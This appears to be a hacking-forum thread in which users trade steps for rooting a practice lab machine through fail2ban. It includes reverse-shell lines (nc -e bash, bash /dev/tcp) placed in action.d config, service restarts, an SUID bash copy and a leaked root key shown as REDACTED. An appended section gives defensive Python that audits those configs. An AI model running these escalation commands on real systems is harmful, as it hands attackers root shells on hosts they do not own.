Posts: 104 Threads: 0 Joined: N/A
(June 20, 2022, 06:40 AM) Himitsu Wrote:
(June 20, 2022, 05:54 AM) undeadly Wrote:
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root: REDACTED
Please edit and remove asap the SSH key in your post. It's no longer allowed to post any private key here. Previously that will be explained by @Internetdreams then please follow.
I agree posting id_rsa is not good

Posts: 6 Threads: 0 Joined: N/A
(June 20, 2022, 05:54 AM) undeadly Wrote:
(June 19, 2022, 07:11 PM) mimikatz Wrote:
(June 19, 2022, 05:13 PM) Truss46 Wrote:
(June 19, 2022, 05:10 PM) wayxoo Wrote:
(June 19, 2022, 05:04 PM) ryzen Wrote:
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM) ryzen Wrote:
(June 19, 2022, 02:53 PM) Truss46 Wrote:
how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file
thanks that got me to root :)
That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.
no, it's not recreated on service restart. there seems to be another cron which recreates those files.
how i did this: delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:

Posts: 7 Threads: 0 Joined: N/A
(June 20, 2022, 05:54 AM) undeadly Wrote:
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:
key is not ok..

Posts: 4 Threads: 0 Joined: N/A
(June 20, 2022, 05:03 AM) hacker1111 Wrote:
(June 19, 2022, 10:42 PM) kezekiel Wrote:
(June 19, 2022, 07:11 PM) mimikatz Wrote:
(June 19, 2022, 05:13 PM) Truss46 Wrote:
(June 19, 2022, 05:10 PM) wayxoo Wrote:
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM) ryzen Wrote:
You can delete and recreate the file
thanks that got me to root :)
That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.
Try this
actionban = cp /usr/bin/bash /home/michael && chmod 4755 /home/michael/bash --> ~/bash -p
lol why cp when u giving suid permission to /bin/bash
for the sake of structural integrity of the machine

Posts: 1 Threads: 0 Joined: N/A
(June 20, 2022, 05:54 AM) undeadly Wrote:
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:
:(((((((((((((((((((((((((((((((((((

Posts: 22 Threads: 0 Joined: N/A June 20, 2022 at 10:10 AM
(June 20, 2022, 09:25 AM) brox9333 Wrote:
(June 20, 2022, 05:54 AM) undeadly Wrote:
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:
:(((((((((((((((((((((((((((((((((((
has anyone managed to do the attack over SSH? I tried with medusa and hydra ☠ fuck ☠

Posts: 64 Threads: 0 Joined: N/A June 20, 2022 at 10:34 AM
(June 20, 2022, 05:54 AM) undeadly Wrote:
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:
thanks

Posts: 10 Threads: 0 Joined: N/A June 20, 2022 at 11:39 AM
sdsdasadsadsad
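
The escalation discussed in this thread depends on an unprivileged user being able to delete and recreate files under /etc/fail2ban/action.d, whose action commands fail2ban then runs as root. The following is an added example, not code from any post in the thread: a Python audit a defender could run to flag that condition. The function names, the `EXPECTED` prefix list and the sample config are assumptions made for illustration.

```python
import configparser
import os
import stat

ACTION_KEYS = ("actionstart", "actionstop", "actioncheck", "actionban", "actionunban")
# Assumption: prefixes a site's firewall actions are expected to start with; tune locally.
EXPECTED = ("<iptables>", "iptables", "ip6tables", "nft", "ipset")
# Constructed sample: a stock-style ban rule plus an unban entry that runs another program.
SAMPLE = """[Definition]
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = /tmp/constructed-helper.sh <ip>
"""

def risky_mode(uid, mode):
    """True if the owner is not root or group/other have write permission."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def unexpected_commands(conf_text):
    """Return (key, line) for action commands that do not start with an expected tool."""
    cp = configparser.RawConfigParser(strict=False)
    try:
        cp.read_string(conf_text)
    except configparser.Error as exc:
        return [("parse-error", str(exc).splitlines()[0])]
    found = []
    for key in ACTION_KEYS:
        value = cp.get("Definition", key, fallback="")
        for line in (raw.strip() for raw in value.splitlines()):
            if line and not line.startswith(EXPECTED):
                found.append((key, line))
    return found

def audit(action_dir="/etc/fail2ban/action.d"):
    """Report risky permissions and unexpected commands under action_dir."""
    report = []
    st = os.stat(action_dir)
    if risky_mode(st.st_uid, st.st_mode):
        # Directory write access is enough to delete and recreate a root-owned file.
        report.append((action_dir, "directory writable by non-root"))
    for name in sorted(os.listdir(action_dir)):
        path = os.path.join(action_dir, name)
        if not name.endswith((".conf", ".local")) or not os.path.isfile(path):
            continue
        st = os.stat(path)
        if risky_mode(st.st_uid, st.st_mode):
            report.append((path, "file writable by non-root"))
        with open(path, encoding="utf-8", errors="replace") as fh:
            report += [(path, f"{k}: {c}") for k, c in unexpected_commands(fh.read())]
    return report
```

The prefix check is coarse, since a command chained after an expected tool still passes it, so treat the ownership and mode findings as the primary signal and the command findings as a prompt for manual review.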